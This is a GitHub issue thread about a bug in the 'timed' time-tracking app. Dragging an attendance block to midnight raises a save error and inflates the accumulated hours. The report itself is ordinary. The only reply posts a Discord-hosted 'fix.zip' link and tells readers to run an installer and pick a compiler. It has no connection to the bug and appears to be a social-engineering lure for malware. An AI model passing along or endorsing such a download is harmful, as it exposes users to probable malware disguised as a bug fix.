### ISSUE TITLE
[BUG]: Adding Attendance until Midnight throws error

### ISSUE THREAD

**Issue by karras** [adfinis/timed#440]
### Description

When adding a new attendance block and moving it all the way to the right, i.e. to midnight, the UI throws an error message: `Error while saving the attendance`.

In addition, the calculated attendance hours in the "tab" starts to accumulate to several hundred hours.

Maybe this is related to #404?

### Steps to Reproduce

1. Open Tracking > Attendance
2. Add a new attendance
3. Move the slider all the way to the right (00:00)
4. An error message should be displayed
5. Move the slider a few times to the left and to the right, the attendance hours will start to accumulate

### Expected Behavior

* No error is displayed, an attendance can be moved to midnight
* The accumulated attendance hours are correct

### Attachments

![image](https://github.com/user-attachments/assets/4e1af2e3-5bb6-41fb-a077-77d782067292)

### Version

v.4.4.1

### Required

- [X] I have checked past issues to see if this bug has already been reported.

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
